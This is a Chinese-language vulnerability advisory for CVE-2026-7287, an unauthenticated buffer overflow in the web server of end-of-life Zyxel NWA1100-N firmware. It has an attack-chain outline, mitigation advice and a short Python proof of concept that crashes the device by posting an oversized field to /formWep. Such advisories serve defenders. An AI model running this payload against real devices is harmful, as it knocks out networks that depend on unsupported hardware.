CVE-2026-7287: Zyxel NWA1100-N webs二进制文件缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-7287

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Zyxel NWA1100-N 定制固件

漏洞概述

CVE-2026-7287 是一个存在于 Zyxel NWA1100-N 定制固件版本 1.00(AACE.1)C0 中的缓冲区溢出漏洞。该漏洞源于设备固件中“webs”二进制文件的多个处理函数未对输入数据进行适当的边界检查。受影响的函数包括 formWep()、formWlAc()、formPasswordSetup()、formUpgradeCert() 和 formDelcert()。由于该产品在漏洞被分配时已被标记为“不再支持”，厂商可能不会提供官方补丁。攻击者无需进行身份认证，即可通过网络向受影响设备发送特制的 HTTP 请求，触发缓冲区溢出，从而导致设备崩溃或服务中断，造成拒绝服务攻击。

技术细节

该漏洞的技术核心在于 Zyxel NWA1100-N 设备固件中的 HTTP 服务器组件（webs 二进制文件）在处理特定表单提交时存在逻辑缺陷。当 webs 二进制文件调用 formWep、formWlAc、formPasswordSetup、formUpgradeCert 或 formDelcert 这些函数来解析用户提交的 HTTP POST 请求参数时，程序未能正确验证输入数据的长度。攻击者可以通过向这些端点发送包含超长字符串的恶意数据包，覆盖栈上的返回地址或相邻内存区域。根据 CVSS 3.1 评分向量（AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H），该漏洞利用难度低，无需用户交互且无需特权。虽然漏洞主要影响可用性（A:H），导致设备重启或 Web 服务挂起，但并未直接赋予攻击者代码执行权限或数据访问权限。鉴于产品已停止支持，该漏洞对仍在使用该老旧设备的网络构成了持续的远程安全威胁。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找暴露的 Zyxel NWA1100-N 设备，识别其 Web 管理端口（通常为 80 或 443）。

STEP 2

武器化与利用

攻击者构造一个特制的 HTTP POST 请求，该请求针对已知的易受攻击函数（如 formWep），并包含超长参数以触发缓冲区溢出。

STEP 3

投递

攻击者通过网络直接向受害设备的 Web 接口发送该恶意请求。由于无需认证，此步骤可轻易完成。

STEP 4

影响

设备处理恶意请求时发生缓冲区溢出，导致 webs 进程崩溃或设备重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target IP address of the vulnerable device
target_ip = "192.168.1.1"

# Vulnerable endpoint example (formWep function)
url = f"http://{target_ip}/formWep"

# Malicious payload: A long string to trigger buffer overflow
# The specific length may vary, 1000 bytes is a common test size
payload = {
    "key": "A" * 1000
}

try:
    print(f"Sending exploit request to {url}...")
    # Sending POST request without authentication
    response = requests.post(url, data=payload, timeout=10)
    print(f"Request sent. Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Connection failed or timed out. Device may have crashed: {e}")

影响范围

Zyxel NWA1100-N Customized Firmware 1.00(AACE.1)C0

防御指南

临时缓解措施

由于 Zyxel NWA1100-N 定制固件版本 1.00(AACE.1)C0 已不再由厂商支持，官方预计不会发布安全更新来修复此漏洞。唯一的根本解决方法是更换设备。对于无法立即更换的环境，强烈建议将设备置于防火墙之后，禁止外部网络访问其 Web 管理端口，并仅允许受信任的管理员 IP 地址进行连接，以最大程度降低被远程攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7287
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7287
3 Details https://www.cvedetails.com/cve/CVE-2026-7287/
4 VulDB https://vuldb.com/cve/CVE-2026-7287
5 Link https://www.zyxel.com/global/en/support/end-of-life